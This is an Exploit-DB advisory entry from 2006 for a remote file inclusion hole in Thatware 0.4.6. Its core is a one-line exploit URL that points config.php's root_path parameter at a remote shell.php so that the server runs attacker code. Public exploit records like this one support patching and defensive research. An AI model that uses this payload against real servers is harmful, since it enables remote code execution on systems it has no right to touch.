Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion

EDB-ID:

2166


Author:

Drago84

Type:

webapps


Platform:

PHP

Date:

2006-08-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://server/dir_thatware/config.php?root_path=http://server/shell.php'

Greatz: str0ke

# milw0rm.com [2006-08-10]